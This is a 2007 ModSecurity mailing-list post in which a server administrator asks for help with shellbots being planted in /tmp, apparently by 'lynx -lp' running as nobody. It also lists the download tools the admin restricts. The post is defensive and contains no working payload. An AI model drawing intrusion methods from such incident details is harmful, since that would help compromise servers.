[Modsecurity] Shellbot installation via lynx -lp
admin at efastservers.com
admin at efastservers.com
Thu Sep 13 13:43:23 EDT 2007
There seems to a new way of installating shellbots into the /tmp directory
on the server and im not positive on how it's being done.
I'v noticed this on 2 of my client's servers in the past few weeks.
What strange about it is mod_security has not caught it. Now we install a
fairly complicated version of the rules on our client's servers. It include
lynx, at least 3 variations and in /usr/bin/lynx is chmod 750 yet it seems
that this is how its being installed at the moment.
I cant understand how lynx -lp is being executed. If its chmod 750 nobody
from the internet can execute the command. Why do I think its lynx -lp?
Because I killed a pid that was executing lynx -lp as the user nobody.
They did not get far. The firewall denies all outbound connections and these
bots usually try to make a connection outbound on port 6667. Even so, im
frustrated as hell trying to find out how it's being done. I searched all
the user logs using egrep and could not find an occurrence of lynx -lp but
it was definitely there and the firewall did tell me that it was a
suspicious process running.
I'm also surprised that our mod_sec rules which is about 57k did not catch
it. If it was used as a cmd= or whatever both cmd and lynx does exist in the
rules and the fact that lynx, wget, scp etc is all chmod 750 is a mystery
too me.
Unless its being installed some other way other than via a malicious url I
have no idea how its getting dumped to /tmp.
Anyone?
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.gotroot.com/pipermail/modsecurity/attachments/20070913/1765fd78/attachment.html
More information about the Modsecurity
mailing list